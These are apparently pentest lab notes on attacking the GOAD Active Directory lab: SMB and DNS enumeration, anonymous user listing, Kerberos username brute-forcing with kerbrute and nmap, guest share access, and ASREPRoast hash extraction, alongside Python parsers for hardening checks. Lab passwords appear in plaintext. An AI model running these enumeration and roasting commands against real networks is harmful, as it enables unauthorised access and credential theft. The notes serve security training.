Enumeration
AD Network Enumeration
Network Overview via Netexec SMB
nxc smb 192.168.56.1/24
SMB 192.168.56.1 445 KILLERKATAK [*] Windows 10 / Server 2019 Build 19041 x64 (name:KILLERKATAK) (domain:killerkatak) (signing:False) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
3 domains, hence 3 DCs (ignore killerkatak):
- essos.local (2 machines)
  - MEEREEN (Windows Server 2016) (signing:True)
  - BRAAVOS (Windows Server 2016) (signing:False)
- sevenkingdoms.local (1 machine)
  - KINGSLANDING (Windows Server 2019) (signing:True)
- north.sevenkingdoms.local (2 machines)
  - WINTERFELL (Windows Server 2019) (signing:True)
  - CASTELBLACK (Windows Server 2019) (signing:False)
By default, DCs require SMB signing (signing:True). From the output above we can therefore tentatively identify the DCs as MEEREEN, KINGSLANDING and WINTERFELL.
As best practice, SMB signing should be required on every host to prevent NTLM relay. This also means signing status alone is not a surefire way of telling DCs apart from domain members; the DNS SRV query further down confirms which host is the DC.
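To turn the raw nxc output into something you can act on (which hosts do not require signing, which still speak SMBv1, which domain each belongs to), here is an added Python parser. It is example code written for these notes, not part of nxc or GOAD; the sample input is the output above, re-embedded as a constructed string, and the "DC candidate" heuristic is only the signing-based guess discussed above.

```python
import re
from collections import defaultdict

# Constructed sample input: nxc smb lines in the format shown above, plus the
# progress line, so the parser is exercised on noise it must skip.
SAMPLE_NXC = """\
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
Running nxc against 256 targets 100% 0:00:00
"""

# One host line: protocol, ip, port, hostname, "[*]", OS banner, then the (key:value) fields.
HOST_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\d+\s+\S+\s+\[\*\]\s+(?P<os>.*?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)\s*$"
)


def parse_nxc_smb(text):
    """Turn nxc smb output into a list of host dicts; non-host lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        hosts.append({
            "ip": m["ip"],
            "name": m["name"],
            "os": m["os"],
            "domain": m["domain"].lower(),
            "signing": m["signing"] == "True",
            "smbv1": m["smbv1"] == "True",
        })
    return hosts


def hosts_by_domain(hosts):
    """Group hostnames by domain, mirroring the hand-written list above."""
    groups = defaultdict(list)
    for h in hosts:
        groups[h["domain"]].append(h["name"])
    return {d: sorted(n) for d, n in groups.items()}


def unsigned_hosts(hosts):
    """Hosts that do not require SMB signing: the ones exposed to NTLM relay."""
    return sorted(h["name"] for h in hosts if not h["signing"])


def smbv1_hosts(hosts):
    """Hosts still answering SMBv1, a legacy dialect that should be disabled."""
    return sorted(h["name"] for h in hosts if h["smbv1"])


def dc_candidates(hosts):
    """Heuristic only: signing is required by default on DCs, so signing:True hosts are
    candidates. Confirm with the DNS SRV query, since members may also require it."""
    return sorted(h["name"] for h in hosts if h["signing"])


if __name__ == "__main__":
    parsed = parse_nxc_smb(SAMPLE_NXC)
    print("by domain:", hosts_by_domain(parsed))
    print("signing not required:", unsigned_hosts(parsed))
    print("SMBv1 enabled:", smbv1_hosts(parsed))
    print("DC candidates:", dc_candidates(parsed))
```

Feed it the saved output of a real scan (`nxc smb 192.168.56.1/24 > scan.txt`) and the two lists `unsigned_hosts` and `smbv1_hosts` are exactly the hosts a hardening pass should fix first.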
Another method: NBTscan
Another method of scanning the subnet for machines.
nbtscan 192.168.56.1/24
Doing NBT name scan for addresses from 192.168.56.1/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.56.23 BRAAVOS <server> <unknown> 00:0c:29:d2:a4:8e
192.168.56.11 WINTERFELL <server> <unknown> 00:0c:29:78:a6:e1
192.168.56.10 KINGSLANDING <server> <unknown> 00:0c:29:41:8c:df
192.168.56.22 CASTELBLACK <server> <unknown> 00:0c:29:70:58:d7
192.168.56.12 MEEREEN <server> <unknown> 00:0c:29:7d:53:da
DNS Query
nslookup
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
- nslookup: Query DNS servers for information about various types of DNS records (e.g., A, AAAA, MX, SRV).
- -type=srv: Specify looking for SRV records, which define the location of servers for a specific service in the domain, such as LDAP, Kerberos, etc.
- _ldap._tcp.dc._msdcs.sevenkingdoms.local: The specific SRV record to query for. It is related to the LDAP service (_ldap), using TCP (_tcp), for Domain Controllers (dc), within the MSDCS (Microsoft Domain Controller Services) part of the domain sevenkingdoms.local.
- 192.168.56.10: The IP address of the DNS server to query.
This queries the server 192.168.56.10 to retrieve the SRV record for the LDAP service of the Domain Controllers in the sevenkingdoms.local domain. SRV records are used by client machines to locate domain controllers and other services within the domain.
For example, an SRV record for _ldap._tcp.dc._msdcs.sevenkingdoms.local might point to a domain controller such as dc01.sevenkingdoms.local, indicating that LDAP services can be reached on that server. In this case, the specified SRV record points to kingslanding.sevenkingdoms.local:
priority = 0
weight = 100
port = 389
svr hostname = kingslanding.sevenkingdoms.local
host command
The same can be achieved using the host command:
host -t srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
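The SRV answer carries more than a hostname: priority and weight tell a client which DC to try first when several records exist. The following added Python example (written for these notes, not part of the host or nslookup tools) parses `host -t srv` answer lines and orders the targets the way an RFC 2782 client would. The sample text is constructed: the kingslanding record is the one the lab returns, while `dc-example-2` and `dc-example-3` are hypothetical extra DCs included only to exercise priority and weight handling.

```python
import random
import re

# Constructed sample in the answer format `host -t srv` prints. The first SRV record is
# the lab's real answer; the two "dc-example-*" targets are hypothetical.
SAMPLE_HOST_OUTPUT = """\
Using domain server:
Name: 192.168.56.10
Address: 192.168.56.10#53
Aliases:

_ldap._tcp.dc._msdcs.sevenkingdoms.local has SRV record 0 100 389 kingslanding.sevenkingdoms.local.
_ldap._tcp.dc._msdcs.sevenkingdoms.local has SRV record 0 50 389 dc-example-2.sevenkingdoms.local.
_ldap._tcp.dc._msdcs.sevenkingdoms.local has SRV record 10 100 389 dc-example-3.sevenkingdoms.local.
"""

SRV_RE = re.compile(
    r"^(?P<name>\S+) has SRV record (?P<priority>\d+) (?P<weight>\d+) (?P<port>\d+) (?P<target>\S+?)\.?$"
)


def dc_locator_name(domain, service="ldap"):
    """Build the _msdcs DC locator record name for a domain (ldap, kerberos, gc, ...)."""
    return f"_{service}._tcp.dc._msdcs.{domain}"


def parse_srv(text):
    """Extract SRV records (priority, weight, port, target) from host(1) output."""
    records = []
    for line in text.splitlines():
        m = SRV_RE.match(line.strip())
        if m:
            records.append({
                "name": m["name"],
                "priority": int(m["priority"]),
                "weight": int(m["weight"]),
                "port": int(m["port"]),
                "target": m["target"],
            })
    return records


def rfc2782_order(records, pick=None):
    """Order targets the way an SRV-aware client tries them (RFC 2782): lowest priority
    first; within one priority a weighted random choice, weight-0 entries least likely.
    `pick(total)` returns an integer in [0, total]; injectable for deterministic tests."""
    if pick is None:
        pick = lambda total: random.randint(0, total)
    ordered = []
    for prio in sorted({r["priority"] for r in records}):
        # Weight-0 records go first so the running-sum walk only picks them when n == 0.
        group = sorted((r for r in records if r["priority"] == prio), key=lambda r: r["weight"])
        while group:
            n = pick(sum(r["weight"] for r in group))
            running = 0
            chosen = group[-1]
            for r in group:
                running += r["weight"]
                if running >= n:
                    chosen = r
                    break
            ordered.append((chosen["target"], chosen["port"]))
            group.remove(chosen)
    return ordered


if __name__ == "__main__":
    recs = parse_srv(SAMPLE_HOST_OUTPUT)
    print(dc_locator_name("sevenkingdoms.local"))
    print(rfc2782_order(recs))
```

With only one record per domain, as in the lab, the ordering is trivial; the point of the function is that `priority` is absolute (the priority-10 DC is only tried after every priority-0 DC has been exhausted) while `weight` only skews the random choice among equals.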
Kerberos
Setting Up Kerberos in Linux
sudo apt install krb5-user
When requested during installation:
- realm : essos.local
- servers : meereen.essos.local
The rest can be set up in /etc/krb5.conf like so:
[libdefaults]
default_realm = essos.local
# The following krb5.conf variables are only for MIT Kerberos.
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
# The following libdefaults parameters are only for Heimdal Kerberos.
fcc-mit-ticketflags = true
[realms]
essos.local = {
kdc = meereen.essos.local
admin_server = meereen.essos.local
}
sevenkingdoms.local = {
kdc = kingslanding.sevenkingdoms.local
admin_server = kingslanding.sevenkingdoms.local
}
north.sevenkingdoms.local = {
kdc = winterfell.north.sevenkingdoms.local
admin_server = winterfell.north.sevenkingdoms.local
}
...
Retrieving Ticket via getTGT.py
Some Notes
The Command
impacket-getTGT essos.local/khal.drogo:horse
- impacket-getTGT: Impacket tool to obtain a Ticket Granting Ticket (TGT) from a Kerberos Key Distribution Center (KDC) in a domain environment. A TGT is the first ticket issued when a user authenticates to a Kerberos-based network (such as Active Directory). This ticket is used to request other service tickets within the domain.
- essos.local/khal.drogo:
  - essos.local: The domain name.
  - khal.drogo: The username of the account for which you're requesting the TGT.
- horse: The password for the khal.drogo account, in plaintext.
Example of a TGT Request Process:
- Requesting TGT: The client requests a TGT from the KDC by providing the username and password.
- KDC Authentication: The KDC verifies the credentials and issues a TGT, encrypted with the user’s password.
- Accessing Resources: The TGT can then be used to request additional service tickets for accessing specific services within the domain.
Similar Tools
- kerberos.py from Impacket: Another tool that can interact with Kerberos tickets.
- Rubeus: A powerful tool for interacting with Kerberos tickets and performing attacks like Pass-the-Ticket.
Practice
Retrieve the TGT:
Save the TGT to the environment variable KRB5CCNAME for use with impacket-smbclient:
export KRB5CCNAME=/home/hans/Documents/GOAD/khal.drogo.ccache
Connect via smbclient using the TGT:
impacket-smbclient -k @braavos.essos.local
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# shares
ADMIN$
all
C$
CertEnroll
IPC$
public
# use C$
# ls
drw-rw-rw- 0 Thu Feb 14 19:42:31 2019 $Recycle.Bin
-rw-rw-rw- 384322 Fri Feb 15 03:39:06 2019 bootmgr
-rw-rw-rw- 1 Fri Feb 15 03:39:06 2019 BOOTNXT
-rw-rw-rw- 554 Tue Dec 24 06:41:51 2024 dns_log.txt
drw-rw-rw- 0 Tue Dec 24 05:48:35 2024 Documents and Settings
drw-rw-rw- 0 Tue Dec 24 06:57:49 2024 inetpub
-rw-rw-rw- 1610612736 Tue Dec 24 07:30:38 2024 pagefile.sys
drw-rw-rw- 0 Thu Feb 14 20:19:37 2019 PerfLogs
drw-rw-rw- 0 Tue Dec 24 07:19:20 2024 Program Files
drw-rw-rw- 0 Tue Dec 24 07:30:21 2024 Program Files (x86)
drw-rw-rw- 0 Tue Dec 24 07:16:28 2024 ProgramData
drw-rw-rw- 0 Tue Dec 24 05:49:52 2024 Recovery
drw-rw-rw- 0 Tue Dec 24 07:16:53 2024 setup
drw-rw-rw- 0 Tue Dec 24 07:33:53 2024 shares
drw-rw-rw- 0 Fri Feb 15 03:41:23 2019 System Volume Information
drw-rw-rw- 0 Tue Dec 24 05:52:40 2024 tmp
drw-rw-rw- 0 Tue Dec 24 07:20:23 2024 Users
drw-rw-rw- 0 Tue Dec 24 06:59:38 2024 Windows
Once done using the TGT, unset it:
unset KRB5CCNAME
Enumerate Users via Anonymous Connections
Netexec
nxc smb 192.168.56.11 --users
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.56.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.56.11 445 WINTERFELL arya.stark 2024-12-23 22:50:12 0 Arya Stark
SMB 192.168.56.11 445 WINTERFELL sansa.stark 2024-12-23 22:50:25 0 Sansa Stark
SMB 192.168.56.11 445 WINTERFELL brandon.stark 2024-12-23 22:50:28 0 Brandon Stark
SMB 192.168.56.11 445 WINTERFELL rickon.stark 2024-12-23 22:50:30 0 Rickon Stark
SMB 192.168.56.11 445 WINTERFELL hodor 2024-12-23 22:50:33 0 Brainless Giant
SMB 192.168.56.11 445 WINTERFELL jon.snow 2024-12-23 22:50:36 0 Jon Snow
SMB 192.168.56.11 445 WINTERFELL samwell.tarly 2024-12-23 22:50:39 0 Samwell Tarly (Password : Heartsbane)
SMB 192.168.56.11 445 WINTERFELL jeor.mormont 2024-12-23 22:50:41 0 Jeor Mormont
SMB 192.168.56.11 445 WINTERFELL sql_svc 2024-12-23 22:50:44 0 sql service
Password Policy
nxc smb 192.168.56.11 --pass-pol
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 192.168.56.11 445 WINTERFELL Minimum password length: 5
SMB 192.168.56.11 445 WINTERFELL Password history length: 24
SMB 192.168.56.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 192.168.56.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Complex: 0
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 192.168.56.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 192.168.56.11 445 WINTERFELL Forced Log off Time: Not Set
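The policy above is weak on several counts (5-character minimum, complexity off, 5-minute lockout). To make that judgement repeatable, here is an added Python example, not part of nxc or the original notes, that parses the `--pass-pol` output into a dict and checks it against a baseline. The baseline numbers (14-character minimum, complexity required, lockout threshold at most 10, lockout duration at least 15 minutes) are assumptions chosen for the example; substitute your own standard. The sample input is the output above, re-embedded as a constructed string.

```python
import re

# Constructed sample: the nxc --pass-pol output for NORTH shown above.
SAMPLE_PASS_POL = """\
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 192.168.56.11 445 WINTERFELL Minimum password length: 5
SMB 192.168.56.11 445 WINTERFELL Password history length: 24
SMB 192.168.56.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 192.168.56.11 445 WINTERFELL Domain Password Complex: 0
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 192.168.56.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 192.168.56.11 445 WINTERFELL Forced Log off Time: Not Set
"""

# Baseline values are assumptions made for this example, not a published standard.
BASELINE = {
    "min_length": 14,
    "require_complexity": True,
    "max_lockout_threshold": 10,
    "min_lockout_minutes": 15,
}

# "SMB <ip> <port> <host> <Key words>: <value>"; banner/progress lines start with "[" and do not match.
FIELD_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.+?)\s*$")


def to_minutes(text):
    """Convert nxc duration strings ("311 days 2 minutes", "Not Set") to minutes."""
    factor = {"day": 1440, "hour": 60, "minute": 1}
    return sum(int(n) * factor[u] for n, u in re.findall(r"(\d+)\s*(day|hour|minute)", text))


def parse_pass_pol(text):
    """Return the policy fields as a dict of raw strings, keyed by nxc's labels."""
    policy = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            policy[m["key"].strip()] = m["value"]
    return policy


def assess(policy, baseline=BASELINE):
    """Compare a parsed policy with the baseline; returns {field: why it fails}."""
    findings = {}
    min_len = int(policy.get("Minimum password length", 0))
    if min_len < baseline["min_length"]:
        findings["Minimum password length"] = f"{min_len} is below {baseline['min_length']}"
    if baseline["require_complexity"] and policy.get("Domain Password Complex", "0") == "0":
        findings["Domain Password Complex"] = "complexity not enforced"
    threshold = int(policy.get("Account Lockout Threshold", 0))
    if threshold == 0:
        findings["Account Lockout Threshold"] = "no lockout: unlimited guessing"
    elif threshold > baseline["max_lockout_threshold"]:
        findings["Account Lockout Threshold"] = f"{threshold} exceeds {baseline['max_lockout_threshold']}"
    duration = to_minutes(policy.get("Locked Account Duration", "0 minutes"))
    if threshold and duration < baseline["min_lockout_minutes"]:
        findings["Locked Account Duration"] = f"{duration} min is below {baseline['min_lockout_minutes']} min"
    return findings


if __name__ == "__main__":
    for field, why in assess(parse_pass_pol(SAMPLE_PASS_POL)).items():
        print(f"[!] {field}: {why}")
```

On the NORTH output this reports the minimum length, the missing complexity requirement and the short lockout duration; the threshold of 5 passes. The same checks run unchanged over saved output from any other domain.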
enum4linux
enum4linux 192.168.56.11
This also returns the user list and password policy, as well as the full Domain Users group membership.
Nullinux
Another tool that can be used to enumerate users and domain information.
% nullinux 192.168.56.11
Starting nullinux v5.5.0dev | 12-30-2024 17:31
[*] Enumerating Shares for: 192.168.56.11
Shares Comments
-------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: 192.168.56.11
[+] Domain Name: NORTH
[+] Domain SID: S-1-5-21-1052593633-76167738-4015273304
[*] Enumerating querydispinfo for: 192.168.56.11
arya.stark
brandon.stark
Guest
hodor
jeor.mormont
jon.snow
rickon.stark
samwell.tarly
sansa.stark
sql_svc
[*] Enumerating enumdomusers for: 192.168.56.11
Guest
arya.stark
sansa.stark
brandon.stark
rickon.stark
hodor
jon.snow
samwell.tarly
jeor.mormont
sql_svc
[*] Enumerating LSA for: 192.168.56.11
[*] Performing RID Cycling for: 192.168.56.11
[*] Testing 192.168.56.11 for Known Users
[*] Enumerating Group Memberships for: 192.168.56.11
[+] Group: Domain Users
Administrator
vagrant
krbtgt
SEVENKINGDOMS$
...<truncated>...
RPC Calls
rpcclient -U "" -N 192.168.56.11
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[arya.stark] rid:[0x456]
user:[sansa.stark] rid:[0x45a]
user:[brandon.stark] rid:[0x45b]
user:[rickon.stark] rid:[0x45c]
user:[hodor] rid:[0x45d]
user:[jon.snow] rid:[0x45e]
user:[samwell.tarly] rid:[0x45f]
user:[jeor.mormont] rid:[0x460]
user:[sql_svc] rid:[0x461]
rpcclient $> enumdomgroups
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Stark] rid:[0x452]
group:[Night Watch] rid:[0x453]
group:[Mormont] rid:[0x454]
net rpc group members 'domain users' -U '' -N -I 192.168.56.11
NORTH\Administrator
NORTH\vagrant
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc
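The RIDs rpcclient prints are the last component of each object's SID, and the low ones are fixed across every AD domain (501 is always Guest, 513 always Domain Users). The added Python example below (written for these notes, not part of rpcclient or nullinux) parses the enumdomusers/enumdomgroups output above, reconstructs full SIDs from the domain SID reported by nullinux, separates well-known objects from ones created in this domain, and lists the RID gaps between the enumerated objects. The gaps matter for exactly the reason the `net rpc group members` output shows: eddard.stark, catelyn.stark and robb.stark exist but did not appear in the anonymous user listing. The sample text is the page's output re-embedded as a constructed string.

```python
import re

# Domain SID as reported by nullinux above; RIDs below are the rpcclient values shown above.
DOMAIN_SID = "S-1-5-21-1052593633-76167738-4015273304"

SAMPLE_RPCCLIENT = """\
user:[Guest] rid:[0x1f5]
user:[arya.stark] rid:[0x456]
user:[sansa.stark] rid:[0x45a]
user:[brandon.stark] rid:[0x45b]
user:[rickon.stark] rid:[0x45c]
user:[hodor] rid:[0x45d]
user:[jon.snow] rid:[0x45e]
user:[samwell.tarly] rid:[0x45f]
user:[jeor.mormont] rid:[0x460]
user:[sql_svc] rid:[0x461]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Stark] rid:[0x452]
group:[Night Watch] rid:[0x453]
group:[Mormont] rid:[0x454]
"""

ENTRY_RE = re.compile(r"^(?P<kind>user|group):\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")

# Well-known domain-relative RIDs: identical in every AD domain, so they identify an
# object even if it has been renamed.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 518: "Schema Admins",
    519: "Enterprise Admins", 520: "Group Policy Creator Owners",
    522: "Cloneable Domain Controllers", 525: "Protected Users", 526: "Key Admins",
}


def parse_rpcclient(text):
    """Parse enumdomusers/enumdomgroups lines into {kind, name, rid} dicts (rid as int)."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append({"kind": m["kind"], "name": m["name"], "rid": int(m["rid"], 16)})
    return entries


def sid_for(rid, domain_sid=DOMAIN_SID):
    """Full object SID = domain SID + '-' + RID."""
    return f"{domain_sid}-{rid}"


def classify(entry):
    """'well-known' for fixed RIDs, 'default' for other RIDs below 1000, 'created' for
    objects allocated from the domain RID pool (1000 and up)."""
    if entry["rid"] in WELL_KNOWN_RIDS:
        return "well-known"
    return "default" if entry["rid"] < 1000 else "created"


def renamed_well_known(entries):
    """Well-known objects whose current name differs from the standard one (e.g. a renamed Administrator)."""
    return [e["name"] for e in entries if e["rid"] in WELL_KNOWN_RIDS and WELL_KNOWN_RIDS[e["rid"]] != e["name"]]


def created_objects(entries):
    """Names of users and groups created in this domain, sorted."""
    return sorted(e["name"] for e in entries if classify(e) == "created")


def rid_gaps(entries):
    """RIDs in the created range that fall between enumerated objects but were not listed:
    candidates for objects hidden from anonymous enumeration (or deleted ones)."""
    seen = sorted(e["rid"] for e in entries if e["rid"] >= 1000)
    if not seen:
        return []
    return [r for r in range(seen[0], seen[-1] + 1) if r not in set(seen)]


if __name__ == "__main__":
    objs = parse_rpcclient(SAMPLE_RPCCLIENT)
    for o in objs:
        print(f"{o['kind']:5} {o['name']:32} {sid_for(o['rid'])}  {classify(o)}")
    print("renamed well-known:", renamed_well_known(objs))
    print("RID gaps:", rid_gaps(objs))
```

Here the gaps come out as 1104, 1105, 1109, 1111, 1112 and 1113; three of those line up with the Stark users that only the Domain Users membership listing revealed, which is the practical lesson: one enumeration method rarely shows everything.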
Bruteforcing Users
In most cases, DCs do not allow for anonymous sessions. As such, we might need to create our own user list to bruteforce Kerberos in order to enumerate users.
In GOAD, since the users are based on characters in Game of Thrones, GOAD’s author created a user list from the list of characters listed in the website:
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/'| grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' > got_users.txt
At the time of writing, there were duplicates so I had to do sort -u to remove them.
Kerbrute
https://github.com/ropnop/kerbrute
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local got_users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/30/24 - Ronnie Flathers @ropnop
2024/12/30 22:45:48 > Using KDC(s):
2024/12/30 22:45:48 > 192.168.56.10:88
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > Done! Tested 80 usernames (7 valid) in 0.071 seconds
% kerbrute userenum --dc 192.168.56.12 -d essos.local got_users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/30/24 - Ronnie Flathers @ropnop
2024/12/30 22:46:00 > Using KDC(s):
2024/12/30 22:46:00 > 192.168.56.12:88
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > Done! Tested 80 usernames (5 valid) in 0.106 seconds
Nmap
Another method to bruteforce users is using an Nmap NSE script:
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 22:58 +08
Nmap scan report for essos.local (192.168.56.12)
Host is up (0.0028s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| [email protected]
| [email protected]
| [email protected]
| [email protected]
|_ [email protected]
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
List Shares as guest
enum4linux
enum4linux -S -u 'guest' -p '' 192.168.56.22
Nullinux
% nullinux -shares -U 'guest' -P '' 192.168.56.22
Starting nullinux v5.5.0dev | 01-01-2025 13:02
[*] Enumerating Shares for: 192.168.56.22
Shares Comments
-------------------------------------------
\\192.168.56.22\ADMIN$ Remote Admin
\\192.168.56.22\all Basic RW share for all
\\192.168.56.22\C$ Default share
\\192.168.56.22\IPC$
\\192.168.56.22\public Basic Read share for all domain users
[*] Enumerating: \\192.168.56.22\all
. D 0 Wed Jan 1 13:00:59 2025
.. D 0 Wed Jan 1 13:00:59 2025
arya.txt A 413 Tue Dec 24 07:33:36 2024
[*] 0 unique user(s) identified
Netexec
For quick enumeration of shares:
nxc smb 192.168.56.10-23 -u 'guest' -p '' --shares
Users But No Credentials
ASREPRoast
Simple:
impacket-GetNPUsers -no-pass -usersfile nullinux_users.txt north.sevenkingdoms.local/
With file output and hash format for hashcat:
impacket-GetNPUsers -no-pass -usersfile nullinux_users.txt north.sevenkingdoms.local/ -format hashcat -outputfile ASREPhash
